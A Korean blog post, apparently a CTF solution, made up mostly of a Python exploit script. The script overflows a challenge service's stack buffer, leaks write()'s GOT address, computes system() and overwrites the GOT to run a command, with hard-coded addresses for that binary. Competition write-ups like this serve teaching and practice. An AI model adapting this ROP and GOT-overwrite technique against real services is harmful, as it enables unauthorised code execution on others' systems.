대회때 서버환경이 뭔지 몰라서, 그냥 우분투 13.04에서 테스트했다.


from socket import *
from struct import *
import time
 
cmd = "id>&4\x00"
 
send_plt = pack('<I',0x80488a0)
recv_plt = pack('<I',0x8048780)
ppppr = pack('<I',0x8049a0c)
write_plt = pack('<I',0x8048790)
write_got = pack('<I',0x804b020)
bss = pack('<I',0x0804b1a0)
 
fd = pack('<I',4)
 
s = socket(AF_INET,SOCK_STREAM)
s.connect(('localhost',7777))
 
payload = ""
payload += "A"*240
payload += send_plt # send address of write
payload += ppppr
payload += fd
payload += write_got
payload += pack('<I',4)
payload += "\x00"*4
 
payload += recv_plt # overwirte to system address
payload += ppppr
payload += fd
payload += write_got
payload += pack('<I',4)
payload += "\x00"*4
 
payload += recv_plt # write command
payload += ppppr
payload += fd
payload += bss
payload += pack('<I',len(cmd))
payload += "\x00"*4
 
payload += write_plt # system call
payload += "AAAA"
payload += bss
 
#print s.recv(1024)
#go = raw_input("go?")
s.send("write"+payload)
time.sleep(0.1)
get = s.recv(1024)
#print get
write_addr = unpack('<I',get[get.find('main')+5:get.find('main')+9])[0]
print "write address: "+hex(write_addr)
 
system_addr = hex(write_addr - 649808)
print "system address: "+system_addr
system_addr = pack('<I',write_addr - 649808)
s.send(system_addr) # system addr
 
s.send(cmd)
print s.recv(1024)
s.close()


'Computer Security > CTF' 카테고리의 다른 글

[HDCon 2013] 3번 문제 write up  (0) 2013.06.08
[HDCon 2013] 1번 문제 write up  (6) 2013.06.08
[CodeGate 2013] Vuln 200, exploit  (0) 2013.06.04
[Secuinside 2013] 127.0.0.1, write up  (0) 2013.05.26
[Secuinside 2013] PE time  (0) 2013.05.26
[Secuinside 2013] Secure Web, write up  (8) 2013.05.26
posted by tunz